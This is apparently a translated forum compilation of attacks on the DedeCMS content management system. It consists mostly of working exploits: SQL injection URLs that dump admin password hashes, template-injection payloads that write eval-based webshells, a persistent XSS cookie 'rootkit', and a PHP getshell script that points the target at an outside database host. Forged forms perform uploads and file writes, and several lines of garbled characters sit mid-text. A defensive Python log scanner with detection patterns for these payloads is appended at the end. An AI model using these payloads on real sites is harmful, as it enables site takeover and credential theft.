Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account, upload a piece of software, and put the following in the "local address" field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, writing a one-liner webshell directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character value; remove 3 more from the front and 1 from the back to get the 16-character MD5.
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From then on, visiting any of the URLs below, in any way, triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// Print the usage banner when the aid argument is missing
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old/
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line (the HTTP status line),
// so this check effectively tests for a "200 OK" status.
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: the mytag_js.php request carrying the _COOKIE[GLOBALS][cfg_db*]
// overrides, which point the target at the database host hard-coded below.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you land directly in the site backend.
The precondition for this vulnerability is that the backend path must be known.
Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit the form below; the shell is at 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form like this:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(these two fields are the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
, f* b7 i- I/ y- j
1 z/ N2 a2 w( K! X% e% e
. M6 R$ I8 ]6 `3 u2 m# t7 _$ @7 S: N3 }
: {' ?& T7 A) @- v9 c2 M
8 m! F# N2 i2 c8 ?0 p( ^
: V# O/ F |( h) ]$ C9 ~" S8 R' K; h1 F* S! g: b
8 N) Q5 _; [7 h: ]3 N) J) v
6 Y: F+ U2 w2 Q9 n( U/ X% T2 C2 G2 L' p1 _. ~& G6 ?
" R4 r& X7 e& [ E4 h2 o8 U7 c' I
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric overflow that raises an error, combined with DEDECMS recording database error messages into a PHP file whose header performs no validation.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" N* X0 h0 C* [+ l7 J2 V
1 j$ Y7 p5 R2 n9 O9 ~7 L+ T7 v) C' G
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
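As an added, defensive example (not code from the forum post or from DedeCMS): a small Python log scanner that flags the request-parameter shapes the payloads above share, namely the _POST/_COOKIE[GLOBALS][cfg_*] variable overwrite, a raw SQL statement or UNION in a parameter, directory traversal in a path value, reflected script markup in gotopage, and PHP code or {dede:} tags in a value. The log lines, hosts and rule names are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (not from the forum post or any real server):
# "<client> <method> <request-target> <status>". The request targets mirror the
# parameter shapes of the DedeCMS payloads above, with placeholder hosts/values.
SAMPLE_LOG = """\
10.0.0.5 POST /plus/mytag_js.php?aid=1&_COOKIE[GLOBALS][cfg_dbhost]=198.51.100.7&_COOKIE[GLOBALS][cfg_dbuser]=x 200
10.0.0.5 GET /dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=198.51.100.7 200
10.0.0.9 GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 200
10.0.0.9 GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif 200
10.0.0.9 GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22 200
10.0.0.9 GET /plus/digg_frame.php?mid=*/eval($_POST[x]);var_dump(3);?%3E 200
10.0.0.2 GET /plus/view.php?aid=2 200
10.0.0.2 GET /member/index.php?uid=test 200
"""

# Detection rules: (name, scope, regex). "key" rules inspect decoded parameter
# names, "value" rules inspect decoded parameter values.
RULES = [
    # _POST[GLOBALS][cfg_*], _COOKIE[GLOBALS][cfg_*] or bare cfg_* parameters:
    # the variable-overwrite shape behind the getshell and backend-login payloads.
    ("globals-override", "key", re.compile(r"GLOBALS\s*\]?\s*\[|(^|\[)cfg_\w+", re.I)),
    # advancedsearch.php sql=..., feedback_js.php UNION and rss.php updatexml() payloads.
    ("raw-sql-statement", "value",
     re.compile(r"union\s+select|select\b.*\bfrom\b|updatexml\s*\(", re.I | re.S)),
    # edit_face.php oldface=/uploads/../.. and templet=../uploads/...: traversal.
    ("path-traversal", "value", re.compile(r"(^|/)\.\.(/|$)")),
    # gotopage="><script>: reflected markup in a redirect parameter.
    ("reflected-script", "value", re.compile(r"<\s*script|javascript:", re.I)),
    # digg_frame.php mid=*/eval(...) and {dede:...} template tags in a value.
    ("php-code-in-param", "value", re.compile(r"<\?php|\?>|\beval\s*\(|\{dede:", re.I)),
]


def scan_target(target):
    """Return the sorted rule names triggered by one request target (path?query)."""
    _, _, query = target.partition("?")
    hits = set()
    for key, value in parse_qsl(query, keep_blank_values=True):
        for name, scope, pattern in RULES:
            if pattern.search(key if scope == "key" else value):
                hits.add(name)
    return sorted(hits)


def scan_log(text):
    """Return (client, path, hits) for every log line that triggers a rule."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        client, _method, target, _status = parts[:4]
        hits = scan_target(target)
        if hits:
            findings.append((client, target.partition("?")[0], hits))
    return findings


if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(hits)}")
```

The rules key on parameter shape rather than on specific strings, so they also catch the select_soft_post.php cfg_* overrides and the {dede:} tag payloads when the same scanner is fed decoded POST bodies.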